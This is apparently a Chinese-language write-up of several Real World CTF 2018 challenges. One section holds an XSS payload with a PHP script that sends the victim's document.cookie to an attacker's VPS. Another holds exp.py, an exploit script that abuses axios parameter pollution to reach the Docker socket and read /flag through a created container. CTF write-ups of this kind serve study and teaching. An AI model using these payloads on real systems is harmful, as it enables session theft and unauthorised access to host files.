Real World CTF (RWCTF) 2018 部分 Writeup

0x01 advertisement (check-in)

Detail

This platform is under protection. DO NOT hack it.

Writeup

任意方式攻击平台导致403就能拿到Flag

(忘了截图，偷来的)

Flag : rwctf{SafeLine 1s watch1ng_uuu}

0x02 dot free (Web)

Detail

All the IP addresses and domain names have dots, but can you hack without dot?

http://13.57.104.34/

Writeup

提交url数组导致报错，根据Debug信息，推测为XSS题目

并暴露部分代码

尝试XSS后不成功，Fuzz后发生意外，非预期

右键查看源码可见

function lls(src) {
    var el = document.createElement('script');
    if (el) {
        el.setAttribute('type', 'text/javascript');
        el.src = src;
        document.body.appendChild(el);
    }
};

function lce(doc, def, parent) {
    var el = null;
    if (typeof doc.createElementNS != "undefined") el = doc.createElementNS("http://www.w3.org/1999/xhtml", def[0]);
    else if (typeof doc.createElement != "undefined") el = doc.createElement(def[0]);

    if (!el) return false;

    for (var i = 1; i
    < def.length; i++) el.setAttribute(def[i++], def[i]);
    if (parent) parent.appendChild(el);
    return el;
};
window.addEventListener('message', function (e) {
    if (e.data.iframe) {
        if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
            if (e.data.iframe.type == "iframe") {
                lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
            } else {
                lls(e.data.iframe.value)
            }
        }
    }
}, false);
window.onload = function (ev) {
    postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*')
}

获取 location.search 内容解析JSON并发送 message 事件，然后据其添加一个 iframe

然后需要绕过

e.data.iframe.value.indexOf('.') == -1
e.data.iframe.value.indexOf("//") == -1
e.data.iframe.value.indexOf("。") == -1
typeof(e.data.iframe != 'object')

即构造十进制ip，web服务默认索引为index.php

<?php
header("Content-type: text/javascript");
?>
var c = escape(document.cookie);
location.href = 'http://vps_ip:7799/?cookie='+c;

Payload : http://13.57.104.34/?%7B%22iframe%22:%7B%22value%22:%22%5C%5C%5C%5Cvps_ip_to_dec:7799%22%7D%7D

Flag : rwctf{L00kI5TheFlo9}

0x03 BookHub (web)

比较有意思，拿出来发单篇

详见 BookHub Writeup - Real World CTF 2018

0x04 PrintMD (web) 复现

RealWorldCTF PrintMD writeup -- CurseRed

Detail

Make HackMD printable ._. http://54.183.55.10/

Hint: If you are not skilled at black-box testing, you need to figure out how PrintMD is compatible with outdated browsers. Flag is in the filesystem /flag

Hint: Here is a render.js for you.

render.js

```javascript

const {Router} = require('express')

const {matchesUA} = require('browserslist-useragent')

const router = Router()

const axios = require('axios')

const md = require('../../plugins/md_srv')

router.post('/render', function (req, res, next) {

let ret = {}

ret.ssr = !matchesUA(req.body.ua, {

browsers: ["last 1 version", "> 1%", "IE 10"],

_allowHigherVersions: true

});

if (ret.ssr) {

axios(req.body.url).then(r => {

ret.mdbody = md.render(r.data)

res.json(ret)

})

}

else {

ret.mdbody = md.render('# 请稍候…')

res.json(ret)

}

});

module.exports = router

```

Writeup

服务器通过判断 User-Agent 是否在服务端抓取并解析markdown文档。

这个地方很尴尬，在控制台发现了xhr下载操作../download，并看了print.ba84889093b992d33112.js但是却没有细看其中的逻辑，看的时候render.js提示还没有放出来，然后也就忘记了/api/render这个操作，无可救药了

然后在看到render.js的时候，误以为是md_srv解析器RCE漏洞，webin太多以至于走火入魔了

然后在 print.ba84889093b992d33112.js 中可以找到将markdown文档发送到服务端解析的代码

validate: function(e) {
    return e.query.url && e.query.url.startsWith("https://hackmd.io/")
},
asyncData: function(ctx) {
    if(!ctx.query.url.endsWith("/download")){
        ctx.query.url += "/download";
    }
    ctx.query.ua = ctx.req.headers["user-agent"] || "";
    return axios.post("/api/render", qs.stringify({...ctx.query})).then(function(e) {
        return {
            ...e.data,
            url: ctx.query.url
        }
    })
},
mounted: function() {
    if (!this.ssr){
        axios(this.url).then(function(t) {
            this.mdbody = md.render(t.data)
        })
    }
}

回顾 render.js ，可知，可以通过HTTP参数 ctx.query 污染后在传递到后端 axios(req.body.url)

因此，这个地方存在一个SSRF漏洞，但是 axios 这个东西是不支持 file:// 协议的，但是通过文档可知，他支持 UNIX Socket ，并给出一个例子 /var/run/docker.sock 。

Ping一波就成功返回 OK

也就是说可以通过 axios 进行对 Docker 的未授权访问！！！

通过 Docker Remote API ，我们可以尽情愉快玩耍！！！

Flag : rwctf{a journey from ssr to ssrf PogChamp}

exp.py

import requests as req
import random
import string
from bs4 import BeautifulSoup
from urllib import quote as urlencode

URL = "http://54.183.55.10/print?{url}&url=https%3A%2F%2Fhackmd.io%2Fvbz2j6hkR9CIgABjEbRrzQ"

headers = {
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
}


def get(u):
    res = req.get(u, timeout=10, headers=headers)
    if res.status_code == 200:
        soup = BeautifulSoup(res.content, "lxml")
        body = soup.select(".markdown-body")
        if body:
            print(body[0].text)
            return True
    print("[-] error")


def fuck(_u):
    _u += '&url[socketPath]=/var/run/docker.sock'
    pl = URL.format(url=_u)
    try:
        get(pl)
    except:
        pass

if __name__ == '__main__':
    container_name = ''.join(random.sample(
        string.ascii_letters + string.digits, 6))
    _us = [
        'url[url]=/_ping&',
        'url[method]=post&url[url]=http://127.0.0.1/images/create?fromImage=alpine:latest',
        'url[method]=post&url[url]=http://127.0.0.1/containers/create?name=%s&url[data][Image]=alpine:latest&url[data][Volumes][flag][path]=/getflag&url[data][Binds][]=/flag:/getflag:ro&url[data][Entrypoint][]=/bin/ls' % container_name,
        'url[method]=post&url[url]=http://127.0.0.1/containers/%s/start' % container_name,
        'url[method]=get&url[url]=http://127.0.0.1/containers/%s/archive?path=/getflag' % container_name
    ]
    for i in _us:
        fuck(i)